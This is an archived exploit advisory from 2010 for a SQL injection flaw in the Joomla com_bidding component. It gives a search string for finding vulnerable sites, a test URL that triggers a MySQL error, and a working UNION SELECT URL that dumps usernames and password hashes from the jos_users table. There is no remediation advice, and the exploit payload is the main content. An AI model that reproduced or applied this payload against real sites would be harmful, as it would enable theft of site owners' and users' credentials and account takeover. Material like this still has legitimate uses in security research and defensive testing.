Joomla Bidding SQL Injection

2010-03-16T00:00:00
ID PACKETSTORM:87279
Type packetstorm
Reporter N2n-Hacker
Modified 2010-03-16T00:00:00

Description

                                        
                                            `  
  
# Title:Joomla com_bidding Sql Injection Vulnerability  
# Author: N2n-Hacker  
# Date:2010-03-16  
# Script: --[Joomla]--  
  
  
#########################################################################  
#########################################################################  
  
[ Joomla com_bidding Sql Injection Vulnerability ]  
  
N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>  
  
  
#########################################################################  
#########################################################################  
  
  
# Searching = "option=com_bidding"  
  
  
==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--  
  
# error =  
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"  
  
  
==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,  
concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--  
  
  
  
\\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////  
  
#########################################################################  
My Bad Life But Not For4ver nchallah  
#########################################################################  
  
  
  
`